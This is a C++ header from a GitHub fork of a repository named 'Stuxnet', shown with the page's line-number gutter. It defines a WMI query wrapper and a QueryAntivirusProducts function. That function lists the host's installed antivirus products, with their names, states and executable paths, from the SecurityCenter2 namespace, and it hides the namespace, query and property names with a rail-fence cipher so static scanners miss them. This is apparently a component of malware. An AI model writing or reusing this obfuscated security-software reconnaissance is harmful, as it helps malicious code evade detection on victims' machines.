forked from pulpocaminante/Stuxnet
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathQueryInterface.hpp
executable file
·352 lines (311 loc) · 12 KB
/
QueryInterface.hpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
#pragma once
#include "WMIConnection.hpp"
#include "ExportInterface.hpp"
#include <any>
class QueryInterface
{
public:
BOOL IReady;
QueryInterface(COMWrapper& com_wrapper, WMIConnection& wmi_connetion) :
IReady(FALSE), COM(com_wrapper), WMI(wmi_connetion)
{
if (COM.IReady && WMI.IReady)
IReady = TRUE;
}
HRESULT Query(
_In_ std::wstring sQuery,
_Out_ std::vector< std::map<std::wstring, std::any> >& vOut)
{
if (!WMI.bConnected)
WMI.ConnectToNamespace("RVOM2OITC\\", 0);
if (!WMI.bConnected)
{
ILog("Failed to connect to namespace\n");
return E_FAIL; // Something is very wrong
}
// Declarations
LPCWSTR lpQuery = sQuery.c_str();
std::vector<std::wstring> vResult;
IWbemClassObject* pclsObj = NULL;
IEnumWbemClassObject* pEnumerator = NULL;
std::map<std::wstring, std::any> properties;
// Convert query to LPWSTR
//IFind.railfence_encipher(5, sQuery.c_str(), lpQuery);
ILog("Querying: %ls\n", sQuery.c_str());
// Execute query
HRESULT hres = WMI.pSvc->ExecQuery(_bstr_t(L"WQL"), _bstr_t(lpQuery),
WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY,
NULL,
&pEnumerator);
// Check for errors
if (SUCCEEDED(hres))
{
// Get the data from the query enumerator
ULONG uReturn = 0;
while (pEnumerator)
{
// Next
hres = pEnumerator->Next(WBEM_INFINITE, 1, &pclsObj, &uReturn);
if (0 == uReturn)
{
break;
}
// Check for errors
if (FAILED(hres))
{
pclsObj->Release();
pEnumerator->Release();
return hres;
}
// Get the names of the properties
SAFEARRAY* pNames = NULL;
hres = pclsObj->GetNames(NULL, WBEM_FLAG_LOCAL_ONLY, NULL, &pNames);
if (SUCCEEDED(hres))
{
// Get the data from the properties
LONG lLBound = 0;
LONG lUBound = 0;
hres = SafeArrayGetLBound(pNames, 1, &lLBound);
hres = SafeArrayGetUBound(pNames, 1, &lUBound);
// Temporary variables for arrays
uintptr_t eUINT16 = 0;
uintptr_t eINT16 = 0;
std::vector<unsigned short> vUINT16;
std::vector<short> vINT16;
LONG lLArrayBound = 0;
LONG lUArrayBound = 0;
std::wstring ws;
for (LONG i = lLBound; i <= lUBound; i++)
{
BSTR bstr;
hres = SafeArrayGetElement(pNames, &i, &bstr);
if (SUCCEEDED(hres))
{
// Get the value of the property
VARIANT vtProp;
VariantInit(&vtProp);
hres = pclsObj->Get(bstr, 0, &vtProp, 0, 0);
if (SUCCEEDED(hres))
{
switch (vtProp.vt)
{
case VT_I4:
properties[bstr] = vtProp.lVal;
break;
case VT_BSTR:
ws = vtProp.bstrVal;
properties[bstr] = ws;
break;
case VT_UI4:
properties[bstr] = vtProp.ulVal;
break;
case VT_UINT:
properties[bstr] = vtProp.uintVal;
break;
case VT_I2:
properties[bstr] = vtProp.iVal;
break;
case VT_DATE:
properties[bstr] = vtProp.date;
break;
case VT_BOOL:
properties[bstr] = vtProp.boolVal;
break;
case VT_I2 | VT_ARRAY:
properties[bstr] = vtProp.parray;
break;
case VT_I4 | VT_ARRAY:
vINT16.clear();
// Get the bounds of the array
SafeArrayGetLBound(vtProp.parray, 1, &lLArrayBound);
SafeArrayGetUBound(vtProp.parray, 1, &lUArrayBound);
for (LONG i = lLArrayBound; i <= lUArrayBound || i <= 40; i++) {
eINT16 = 0;
// Get the element at the current index
SafeArrayGetElement(vtProp.parray, &i, &eINT16);
if(eINT16)
vINT16.push_back(eINT16);
}
properties[bstr] = vINT16;
break;
case VT_UINT | VT_ARRAY:
break;
case VT_UI4 | VT_ARRAY:
vUINT16.clear();
// Get the bounds of the array
SafeArrayGetLBound(vtProp.parray, 1, &lLArrayBound);
SafeArrayGetUBound(vtProp.parray, 1, &lUArrayBound);
for (LONG i = lLArrayBound; i <= lUArrayBound; i++) {
eUINT16 = 0;
// Get the element at the current index
SafeArrayGetElement(vtProp.parray, &i, &eUINT16);
if(eUINT16)
vUINT16.push_back(eUINT16);
}
properties[bstr] = vUINT16;
break;
case VT_UI2 | VT_ARRAY:
default:
break;
}
}
VariantClear(&vtProp);
}
}
vOut.push_back(properties);
}
// Destroy safe array
SafeArrayDestroy(pNames);
}
// Cleanup
if(pEnumerator)
pEnumerator->Release();
if(pclsObj)
pclsObj->Release();
}
return hres;
}
HRESULT QueryAntivirusProducts(
_In_ std::vector<AVProduct>& pAVProducts)
{
if (wcscmp(WMI.currentNamespace, L"RutOcrneOeierTStC2\\y") != 0)
WMI.ConnectToNamespace("RutOcrneOeierTStC2\\y", 0);
if (!WMI.bConnected)
{
ILog("Failed to connect to namespace\n");
return E_FAIL; // Something is very wrong
}
// Use the IWbemServices pointer to make requests of WMI
HRESULT hres;
LPWSTR lpQuery = new WCHAR[256];
IEnumWbemClassObject* pEnumerator = NULL;
IFind.railfence_wdecipher(5, L"S trE*FniPoL RAVsdETO iuutCMrc", lpQuery);
hres = WMI.pSvc->ExecQuery(
_bstr_t("WQL"),
_bstr_t(lpQuery),
WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY,
NULL,
&pEnumerator);
if (FAILED(hres))
{
ILog("Query for antivirus products failed. Error code = 0x%lx\n", hres);
return hres; // Program has failed.
}
delete[] lpQuery;
// Get the data from the query in step 6
IWbemClassObject* pclsObj = NULL;
ULONG uReturn = 0;
while (pEnumerator)
{
AVProduct avProduct;
HRESULT hr = pEnumerator->Next(WBEM_INFINITE, 1, &pclsObj, &uReturn);
if (0 == uReturn)
{
break;
}
VARIANT vtProp = { 0 };
// Get the value of the Name property
LPWSTR displayName = new WCHAR[256];
IFind.railfence_wdecipher(5, L"daiNmsyepal", displayName);
hr = pclsObj->Get(displayName, 0, &vtProp, 0, 0);
if (!FAILED(hr)) {
if ((vtProp.vt == VT_NULL) || (vtProp.vt == VT_EMPTY))
ILog("Property displayName is not set\n");
else
{
// Copy to output structure
avProduct.displayName = vtProp.bstrVal;
VariantClear(&vtProp);
}
}
delete[] displayName;
// Get the value of the instanceGuid property
LPWSTR instanceGuid = new WCHAR[256];
IFind.railfence_wdecipher(5, L"iGneuscitnda", instanceGuid);
hr = pclsObj->Get(instanceGuid, 0, &vtProp, 0, 0);
if (!FAILED(hr)) {
if ((vtProp.vt == VT_NULL) || (vtProp.vt == VT_EMPTY))
ILog("Property is not set\n");
else
{
// Copy to output structure
avProduct.instanceGuid = vtProp.bstrVal;
VariantClear(&vtProp);
}
}
delete[] instanceGuid;
// Get the value of the productState property
LPWSTR productState = new WCHAR[256];
IFind.railfence_wdecipher(5, L"ptrSaottdceu", productState);
hr = pclsObj->Get(productState, 0, &vtProp, 0, 0);
if (!FAILED(hr)) {
if ((vtProp.vt == VT_NULL) || (vtProp.vt == VT_EMPTY))
ILog("Property is not set\n");
else
{
// Copy to output structure
avProduct.productState = vtProp.uintVal;
VariantClear(&vtProp);
}
}
delete[] productState;
// Get the value of the pathToSignedProductExe
LPWSTR pathToSignedProductExe = new WCHAR[256];
IFind.railfence_wdecipher(5, L"pguaindctSeothodrEeTPx", pathToSignedProductExe);
hr = pclsObj->Get(pathToSignedProductExe, 0, &vtProp, 0, 0);
if (!FAILED(hr)) {
if ((vtProp.vt == VT_NULL) || (vtProp.vt == VT_EMPTY))
ILog("Property is not set\n");
else
{
// Copy to output structure
avProduct.pathSignedExe = vtProp.bstrVal;
VariantClear(&vtProp);
}
}
delete[] pathToSignedProductExe;
// Get the value of the pathToSignedReportingExe
LPWSTR pathToSignedReportingExe = new WCHAR[256];
IFind.railfence_wdecipher(5, L"pgrainotetSepixhodenETRg", pathToSignedReportingExe);
hr = pclsObj->Get(pathToSignedReportingExe, 0, &vtProp, 0, 0);
if (!FAILED(hr)) {
if ((vtProp.vt == VT_NULL) || (vtProp.vt == VT_EMPTY))
ILog("Property is not set\n");
else
{
// Copy to output structure
avProduct.pathReportingExe = vtProp.bstrVal;
VariantClear(&vtProp);
}
}
delete[] pathToSignedReportingExe;
// Get the value of the onAccessScanningEnabled property
LPWSTR timestamp = new WCHAR[256];
IFind.railfence_wdecipher(5, L"tpimmaets", timestamp);
hr = pclsObj->Get(timestamp, 0, &vtProp, 0, 0);
if (!FAILED(hr)) {
if ((vtProp.vt == VT_NULL) || (vtProp.vt == VT_EMPTY))
ILog("Property is not set\n");
else
{
// Copy to output structure
avProduct.timestamp = vtProp.bstrVal;
VariantClear(&vtProp);
}
}
delete[] timestamp;
// Push the AVProduct to the vector
pAVProducts.push_back(avProduct);
}
// Cleanup
if (pEnumerator)
pEnumerator->Release();
if (pclsObj)
pclsObj->Release();
return hres;
}
private:
WMIConnection& WMI;
COMWrapper& COM;
IExport IFind;
};